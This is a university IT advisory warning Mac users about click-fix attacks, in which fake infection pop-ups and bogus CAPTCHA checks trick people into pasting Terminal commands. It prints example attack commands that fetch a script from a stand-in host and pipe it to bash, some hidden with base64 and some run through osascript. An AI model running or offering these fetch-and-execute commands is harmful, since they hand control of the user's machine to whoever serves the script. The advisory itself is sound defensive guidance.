SDU IT
Mac User: How to Avoid Click-Fix Attacks
SDU IT is increasingly experiencing so-called click-fix attacks targeting macOS users at the university. These attacks attempt to trick you into performing harmful actions under the guise of "solving a problem."
Typical patterns to be aware of:
- Pop-ups or websites claiming that your Mac is infected and urging you to “fix the issue”
- Instructions to open Terminal.app and paste (copy/paste) commands
- Scripts disguised as “security updates” or “certificate fixes”
- Use of AppleScript via osascript to execute hidden commands
- Long, opaque strings (often base64-encoded like this:
SmVnIGVyIGVuIGJhc2U2NCBlbmtvZGV0IHN0cmVuZywgc29tIHNrYWwgZsO
lIGRpZyB0aWwgYXQgdHJvIGF0IGFsdCBlciBmcmVkIG9nIGluZ2VuIGZhcmUs
IGltZW5zIGplZyBzdGrDpmxlciBhbGxlIGRpbmUgZGF0YQo
Example of a click-fix-like pattern (base64):
You may be asked to insert the following into Terminal:
echo "ZWNobyAiSGVudGVyIG9nIGtcdTAwZjhyZXIgZWtzdGVybiBrb2RlIiAmJiBjd
XJsIC1zIGh0dHBzOi8vZXZpbC5leGFtcGxlL3NjcmlwdC5zaCB8IGJhc2g=" | base64 --decode | bash
After decoding:
echo "Fetching and executing external code" && curl -s https://evil.example/script.sh | bash
What does it do?
- Displays a harmless message
- Fetches code from the internet
- Executes it directly on your machine
Example of an AppleScript-based attack using the osascript command:
You may be asked to run:
osascript -e 'do shell script "curl -s https://evil.example/payload.sh | bash"'
Variation combining the two tactics from before:
osascript -e 'do shell script (do shell script "echo Y3VybCAtcyBodHRwczovL2V2aWwuZXhhbXBsZS9wYXlsb2FkLnNoIHwgYmFzaA== | base64 --decode")'
After decoding:
curl -s https://evil.example/payload.sh | bash
What does this type of command do?
- Uses AppleScript (osascript) to execute shell commands
- Can bypass user expectations (it doesn’t look like a “classic” Terminal command)
- Fetches and executes external code – often hidden via encoding
- In some cases, can trigger system dialogs or run with elevated privileges depending on the context
Example of an attack based on the misuse of CAPTCHA verification
We also observe attacks where well-known CAPTCHA mechanisms (“Verify that you are not a robot”) are misused as bait.
This is how it might look:
- A pop-up or website displays a CAPTCHA
- After “verification,” the user receives instructions such as:
“To complete the security check, copy and paste the following command into Terminal” - The command often resembles the above examples (base64 or
osascript)
What is the issue?
CAPTCHA is a familiar and trustworthy pattern, typically used legitimately. Attackers exploit this familiarity to make the action appear safe and necessary. In reality, there is no legitimate connection between a CAPTCHA verification and the need to execute commands on your own computer.
Important to remember:
- CAPTCHA never requires you to open Terminal or execute commands
- Any instruction combining “verification” with local command execution is a clear warning sign
Warning signs:
If such actions were legitimate, there would be no reason to hide the actual commands or their purpose behind base64 or similar obfuscation. A lack of transparency is a strong warning sign.
SDU’s recommendation:
- Never execute commands you do not fully understand
- Avoid running commands with hidden or encoded content
- Be particularly skeptical of osascript commands from external sources
- Do not trust instructions from random websites or pop-ups
- Contact SDU IT Support if you are in doubt - better to ask one time too many than one time too few!
If you encounter anything suspicious, contact us immediately via phone, email, or at https://service.sdu.dk.
Du you have any questions?
If your query isn’t urgent, feel free to create a support ticket.
We will get back to you as soon as possible.
Phone: 6550 2990
Email: servicedesk@sdu.dk